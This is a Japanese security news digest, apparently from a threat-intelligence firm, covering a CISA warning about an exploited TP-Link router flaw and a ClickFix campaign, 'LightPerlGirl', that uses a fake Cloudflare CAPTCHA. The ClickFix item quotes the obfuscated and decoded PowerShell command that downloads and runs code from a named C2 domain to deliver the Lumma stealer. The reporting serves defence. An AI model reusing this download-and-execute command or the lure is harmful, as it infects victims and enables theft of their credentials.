-
Analyst's Choice
Cyber Intelligence
フィッシング
GmailとMS 365の利用者は注意を:フィッシングキット「Tycoon 2FA」の概要と対策
Rory
2024.04.16
-
Analyst's Choice
AI
Cyber Intelligence
OSINT
DarkGPT – ChatGPT-4を活用した、流出データベース検出のためのOSINTツール
Rory
2024.04.15
-
Analyst's Choice
Cyber Intelligence
GitHub
Intelligence
脅威アクターがGitHubを不正な目的で悪用するケースが増加
Rory
2024.02.07
6月18日:サイバーセキュリティ関連ニュース
TP-Linkルーターにおけるコマンドインジェクションの脆弱性が攻撃で悪用されている:CISAが警告(CVE-2023-33538)
The Hacker News – Jun 17, 2025
TP-Link製ルーターにおける深刻度の高い脆弱性CVE-2023-33538が実際の攻撃で悪用されていると、米CISAが警告。KEVカタログ(悪用が確認済みの脆弱性カタログ)に追加して連邦政府機関に7月7日までの対応を呼びかけた。
CVE-2023-33538はCVSSスコアが8.8のコマンドインジェクションの脆弱性。攻撃者による悪用が成功した場合、任意のシステムコマンドを実行される恐れがあるとされる。TL-WR940N V2/V4、TL-WR841N V8/V10、TL-WR740N V1/V2が影響を受けるが、これら3つのモデルはすべて公式サポートが終了しており、今後修正プログラムが提供される可能性は低いという。
この脆弱性がどのような攻撃で、どのアクターによって、どの程度の規模で悪用されているのかなどに関する公の情報は現時点で確認されていないとのこと。
ClickFixマルウェアの新種「LightPerlGirl」が見つかる
ClickFixマルウェアの新種「LightPerlGirl」を、MSP向けネットワーキング・セキュリティプラットフォームTodylの研究者らが発見。マルウェア自体に含まれる「Copyright (c) LightPerlGirl 2025」という著作権表示にちなんでLightPerlGirlと名付けられた同マルウェアにはロシア語の文字列も見受けられるが、実際の発信源やキャンペーンの範囲などは現時点で不明だという。
ClickFixとは、ソーシャルエンジニアリングを使ってユーザーを騙し、ユーザー自身のデバイス上でLOLBINSマルウェアをロードするよう仕向ける手法。LightPerlGirlのケースでは、PowerShellを使って悪性コードをターゲットユーザーに実行させることで、マルウェアが投下されていた。
Todylは、同社のパートナーのクライアントユーザーがガラパゴス諸島への旅行に関する正規のWordPressサイトを訪れ、そこでマルウェアに感染したことがきっかけでLightPerlGirlを発見。このサイトはそれ以前に侵害され、訪問者にソーシャルエンジニアリング攻撃を仕掛けるためのJavaScriptが仕組まれていた。これにより、今回の被害者はCloudflareのCAPTHCAページに見せかけたポップアップダイアログボックスを提示され、そこで「セキュリティプロセス」と称される以下のステップに従うよう指示されたという:
- ①「Windows」キーと「Run」キーの押下
- ②「Ctrl」キーと「V」キーの押下による認証用テキストのコピー
- ③「OK」のクリックによる「ロボットではない」ことの証明
これらのステップに従う中で、ユーザーのクリップボードには1つ目のPowerShellコマンドがロードされ、「Run(ファイル名を指定して実行)」ダイアログボックスが開かれるとそこにペーストされてコードが実行される。
1つ目のコマンドは以下のように難読化されており、訪問者は認識できない可能性が高い。
“C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe” –nOp –w h –C “$rb”l”d30 = ‘cmb”k”z”8kz1″0″0″01″0″8k2″ca”rj”ew”z”f.inf”o’; $v”nr”l”01″ = Invo”k”e”- “RestM”e”th”o”d -Uri $rb”l”d”3″0; I”nvo”k”e-E”xp”ress”i”o”n $v”n”r”l0″1”
しかし難読化を解除したものは以下の通りで、PowerShellのコマンドレット「invoke-RestMethod」と「Invoke-Expression」を使ってC2(cmbkz8kz1000108k2carjewzf[.]info)からのレスポンスを実行できるようになっていたという。
“C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe” –nOp –w h –C $rbld30 = ‘cmbkz8kz1000108k2carjewzf.info’;
$vnrl01 = Invoke-RestMethod -Uri $rbld30; Invoke-Expression $vnrl01
この攻撃で最終的に配布されたマルウェアペイロードはLummaスティーラーだったとされているものの、Todylの研究者らは「ロシアを拠点とするLummaの出どころは今回のClickFixキャンペーンの出どころでもあるのか、または今回のClickFixキャンペーンの開発者は別個に存在しており、Lummaをサービスとして利用しているのか?」、「LightPerlGirlの影響はどの程度広がっているのか?」といった疑問への答えを得るべく調査を続けているという。
ClickFix手法でよく見受けられる悪意あるPowerShellの利用は、EDRなど最新のセキュリティツールで検出可能。しかし今回のキャンペーンで使われたのはガラパゴス諸島での休暇という贅沢なテーマのWebサイトで、訪問者はそのための十分な予算を持つ裕福な個人である可能性が高い。つまり企業の経営層や役員が訪問者に含まれている可能性がある上、こうした人々は自宅から自分自身のPCでこのサイトを訪れるものと思われる。業務用PCとは異なり、そうした私用PCは最新のEDRで保護されていないことが大半であることから、LOLBINSを用いるClickFixの手法は見過ごされてしまうことが予想される。
このシナリオ通りに企業の経営幹部などが知らぬ間にインフォスティーラーに感染した場合、スティーラーが私用PCを探って当該企業のネットワークへ侵入するための糸口を掴むこともあり得る。このように個人(従業員や役員など)の感染が最終的に大企業の侵害へと発展する恐れがあるのがClickFixの真の恐ろしさだと、SecurityWeek紙は指摘している。
【無料配布中!】ディープ&ダークウェブ関連レポート
弊社が作成したレポート『ディープ&ダークウェブにおけるSNSアカウント売買とディープフェイク』を無料配布中です!
ネット上の匿名性を悪用した不正や犯罪が日本においても大きな脅威となる中、弊社アナリストが過去 1 年間のディープ & ダークウェブ上の投稿データを調査。「SNS アカウント売買」「ディープフェイク」という切り口から、ネット上の匿名性を悪用する脅威アクターらの実態をレポートにまとめました。
無料ダウンロードはこちらのバナーから:
レポートの内容
第1章:アカウント売買・貸与
- 中国語アカウントマーケット
- 英語 Black Hat SEO 関連フォーラム
- 英語「デジタル権利マーケット」
- ロシア語 SMM ツールフォーラム
- 英語暗号資産関連フォーラム
- ロシア語ハッキングフォーラム
第2章:ディープフェイク
- DDW で言及されたディープフェイク
- ディープフェイク関連の特筆すべき投稿
